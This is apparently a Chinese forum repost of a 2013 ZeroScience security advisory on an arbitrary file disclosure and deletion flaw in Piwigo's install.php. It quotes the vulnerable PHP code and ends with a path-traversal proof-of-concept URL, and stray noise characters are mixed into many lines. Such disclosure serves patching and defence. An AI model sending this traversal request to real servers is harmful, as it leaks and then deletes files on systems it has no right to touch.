Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
9 |6 ?) x* {& \# ]& M
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
/install.php:
-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
" K6 T. P- L. i$ y- W# i  _8 b116:   header('Cache-Control: no-cache, must-revalidate');
  c3 X+ D  q8 W; ^  E117:   header('Pragma: no-cache');
1 F: [/ Y3 W8 x9 ]4 }118:   header('Content-Disposition: attachment; filename="database.inc.php"');
: d' t+ m# `; _1 q( T" w119:   header('Content-Transfer-Encoding: binary');
1 N* N1 D* G* W" T6 s120:   header('Content-Length: '.filesize($filename));
7 ~) S5 T) j! m8 n  D$ f121:   echo file_get_contents($filename);
122:   unlink($filename);
123:   exit();
, o7 Z! X+ P5 G% h) H1 e  q124: }
====================================================================
/ M0 b9 _; B% m" M
2 M3 H4 r4 Z9 v. O7 i3 T6 Z9 c; x3 dTested on: Microsoft Windows 7 Ultimate SP1 (EN)
( k2 m0 r) n7 r' q4 V           Apache 2.4.2 (Win32)
           PHP 5.4.4
; U6 a/ f( s2 K+ s! ?           MySQL 5.5.25a
6 @- @  O5 d' T* C9 H- d! D
0 o+ c7 K( {4 _; |0 j& h6 HVulnerability discovered by Gjoko 'LiquidWorm' Krstic
1 o) X8 }/ b1 r: E' w) r' A                            @zeroscience

  x' T" h- d- ~( T! v8 BAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

$ z- U0 O8 l& l15.02.2013

. R- q0 C2 W; }% v5 k9 U--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt